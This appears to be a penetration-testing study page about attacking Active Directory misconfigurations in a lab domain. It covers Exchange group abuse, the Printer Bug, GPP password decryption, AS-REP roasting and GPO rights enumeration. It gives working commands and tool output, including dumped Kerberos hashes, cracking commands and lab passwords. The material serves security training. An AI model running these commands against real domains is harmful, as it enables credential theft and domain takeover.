⚙️Misconfigurations

In a default installation of Microsoft Exchange within an AD environment it will be given many privileges within the domain. The group Exchange Windows Permission is not listed as a protected group but members are given the ability to write a DACL to the domain object.

An attacker can use this to add accounts to this group via a DACAL misconfiguration.

More techniques can be found here

GitHub - gdedrouas/Exchange-AD-Privesc: Exchange privilege escalations to Active DirectoryGitHub

The Exchange Group Organization Management is another powerful group that can access the mailboxes of all domain users. Sysadmins are usually members of the group. If we can compromise an Exchange server it will often lead to Domain Admin privileges. We should also be aware that dumping creds will often lead to 100's of cleartext credentials or NTLM hashes!

PrivExchange

These attacks are flaws in the Exchange Server PushSubscription feature, which allows any domain user with a mailbox to force the Exchange server to authenticate to any host provided by the client over HTTP.

Printer Bug

A flaw in the MS-RPRN protocol (Print System Remote Protocol).

To leverage this flaw any domain user can connect to the spools named pipe with the RpcOpenPrinter methods and the RpcRemoteFindFirstPrinterChangeNotificationEx method and force the server to authenticate to any host provided by the client over SMB.

Enumerating for MS-PRN Printer Bug

We can use Get-SpoolStats from the SecurityAssesment tool to check for vulnerable machines

Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

MS14-068

A flaw in Kerberos which can be leveraged with standard domain user creds to elevate privileges to Domain Admin. A Kerberos ticket contains information about a user, including the account name, ID, and group membership in the Privilege Attribute Certificate (PAC). The PAC is signed by the KDC using secret keys to validate that the PAC has not been tampered with after creation.

This allowed a forged PAC to be accepted by the KDC as legitimate. We can create a fake PAC, presenting a user as a member of the Domain Administrators or other privileged group. The tools such as the Python Kerberos Exploitation Kit (PyKEK) or the Impacket toolkit can be used to exploit this.

Sniffing LDAP Credentials

Many applications and printers store LDAP cred in their web admin console to connect to the domain. The consoles often have weak or default passwords and sometimes are even cleartext. Some applications have a test function that means we can gather credentials by changing the LDAP IP address to our attack host IP.

Enumerating DNS Records

We can use https://github.com/dirkjanm/adidnsdump to enumerate all DNS records in a domain using a valid user account. By default, all users can list the child objects of a DNS zone in an AD environment, the tool uses this to resolve al records in the zone and tries to find something useful for our engagement.

Using adidnsdump

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 
Password: 

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 27 records

Viewing the Contents of the records file

head records.csv 
type,name,value
?,LOGISTICS,?
AAAA,ForestDnsZones,dead:beef::7442:c49d:e1d7:2691
.....

Using the -r option to Resolve Unknown Records

If we run the tool with the -r option it will attempt to resolve unknown records by performing an A query.

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r
Password: 

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 27 records

Password in Description Field

Sometimes sensitive information is found in the user account Description or Notes fields.

Finding Passwords in the Description Field

We can use PowerView to quickly search through large domains

Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}

PASSWD_NOTREQD Field

Some domain accounts may have the field passwd_notreqd set, if this is found it means the users could have a shorter password or no password set at all.

Checking for PASSWD_NOTREQD Setting

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Credentials in SMB Shares and SYSVOL Scripts

It can be a treasure trove of data, especially in large organizations. It may also contain different batch scripts within the scripts directory. Sometimes we can find very old scripts containing disabled accounts or old passwords.

Example Discovering an Interesting Script

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
..
-a----         3/8/2022   2:56 PM            979 reset_local_admin_pass.vbs 

cat \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs

On Error Resume Next
strComputer = "."
 
Set oShell = CreateObject("WScript.Shell") 
sUser = "Administrator"
sPwd = "!ILFREIGHT_L0cALADmin!"
 
Set Arg = WScript.Arguments
If  Arg.Count > 0 Then
sPwd = Arg(0) 'Pass the password as parameter to the script
End if
 
'Get the administrator name
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

<SNIP>

Group Policy Preferences (GPP) Passwords

When a new GPP is created in an.xml file is created in the SYSVOL share, which is also locally cached on endpoints that the Group Policy applies to. These file include

Map drives (drives.xml)
Create local users
Create printer config files (printers.xml)
Creating and updating services (services.xml)
Creating scheduled tasks (scheduledtasks.xml)
Changing local admin passwords.

They contain an array of config data and defined passwords.

The XML looks like the following

Decrypting the Password with gpp-decrypt

If we retrieve the cpassword value, we can decrypt it with gpp-decrypt

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE

Locating GPP Passwords with CME

GPP password can located by searching the SYSVOL share or using tools like https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 and CrackMapExec.

crackmapexec smb -L | grep gpp
[*] gpp_autologin             Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password              Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

Using CME's gpp_autologin Module

We can also find password in files such a Registry.xml when autologon is configured via Group Policy.

crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

AS-REP Roasting

Occurs when a user account has the privilege “Does not require Pre-Authentication” set. The account does not need to provide valid identification before requesting a ticket.

Viewing an Account with the Do not Require Kerberos Preauthentication Option

Enumerating for DONT_REQ_PREAUTH Value using Get-DomainUser

We can use PowerView to enumerate users with their UAC value set to DONT_REQ_PREAUTH

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Retrieving AS-REP in Proper Format with Rubeus

With Rubeus we can try to obtain the ticket for the target account. If an attacker has GenericWrite or GenericAll permissions over an account, they can enable this attribute and obtain the AS-REP ticket for offline cracking to recover the account's password before disabling the attribute again.

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Cracking the Hash with Hashcat

With the mode set to -m 18200 we can attempt to crack the hash

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

Retrieving the AS-REP Using Kerbrute

This tool will automatically retrieve the AS-REP for any users found that do not require Kerberos pre-auth.

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 

  __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 13:14:17 >  Using KDC(s):
2022/04/01 13:14:17 >  	172.16.5.5:88

2022/04/01 13:14:17 >  [+] VALID USERNAME:	 sbrown@inlanefreight.local
2022/04/01 13:14:17 >  [+] mmorgan has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$mmorgan@INLANEFREIGHT.LOCAL:400d306dda575be3d429aad39ec68a33$8698ee566cde591a7ddd1782db6f7ed8531e266befed4856b9fcbbdda83a0c9c5ae4217b9a43d322ef35a6a22ab4cbc86e55a1fa122a9f5cb22596084d6198454f1df2662cb00f513d8dc3b8e462b51e8431435b92c87d200da7065157a6b24ec5bc0090e7cf778ae036c6781cc7b94492e031a9c076067afc434aa98e831e6b3bff26f52498279a833b04170b7a4e7583a71299965c48a918e5d72b5c4e9b2ccb9cf7d793ef322047127f01fd32bf6e3bb5053ce9a4bf82c53716b1cee8f2855ed69c3b92098b255cc1c5cad5cd1a09303d83e60e3a03abee0a1bb5152192f3134de1c0b73246b00f8ef06c792626fd2be6ca7af52ac4453e6a
...

Hunting for Users with Kerberos Pre-auth Not Required

With a valid list of users, we can use the below tool to hunt for all users with Kerberos pre-auth not required.

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users 
[-] User asanchez@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dlewis@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ccruz@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$mmorgan@inlanefreight.local@INLANEFREIGHT.LOCAL:47e0d517f2a5815da8345dd9247a0e3d$b62d45bc3c0f4c306402a205ebdbbc623d77ad016e657337630c70f651451400329545fb634c9d329ed024ef145bdc2afd4af498b2f0092766effe6ae12b3c3beac28e6ded0b542e85d3fe52467945d98a722cb52e2b37325a53829ecf127d10ee98f8a583d7912e6ae3c702b946b65153bac16c97b7f8f2d4c2811b7feba92d8bd99cdeacc8114289573ef225f7c2913647db68aafc43a1c98aa032c123b2c9db06d49229c9de94b4b476733a5f3dc5cc1bd7a9a34c18948edf8c9c124c52a36b71d2b1ed40e081abbfee564da3a0ebc734781fdae75d3882f3d1d68afdb2ccb135028d70d1aa3c0883165b3321e7a1c5c8d7c215f12da8bba9

Group Policy Object (GPO) Abuse

Group Policy provides admins with many advanced settings that can be applied to both user and computer object in an AD environment. If we gain rights over a GPO via an ACL misconfiguration, we could leverage this for lateral movement, privilege escalation and even domain compromise.

GPO misconfigurations can be abused to perform the following attacks:

Adding additional rights to a user (such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeImpersonatePrivilege)
Adding a local admin user to one or more hosts
Creating an immediate scheduled task to perform any number of actions

Enumerating GPO Names with PowerView

We can use PowerView to enumerate GPO information and get a listing of GPOs by name

Get-DomainGPO |select displayname

Enumerating GPO Names with PowerShell

Get-GPO -All | Select DisplayName

Enumerating Domain User GPO Rights

We can check if a user has any rights over a GPO, a good first check is to see if the entire Domain Users Group has any rights over one or more GPOs.

We should look out for permissions such as WriteProperty and WriteDacl, as we can leverage these to give ourselves full control over the GPO.

$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

Converting GPO GUID to Name

We can get the display name of the GPO using the Get-GPO function

Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532

PreviousBleeding Edge Vulnerabilities NextDomain Trusts

Last updated 1 year ago

Was this helpful?

Exchange Related Group Membership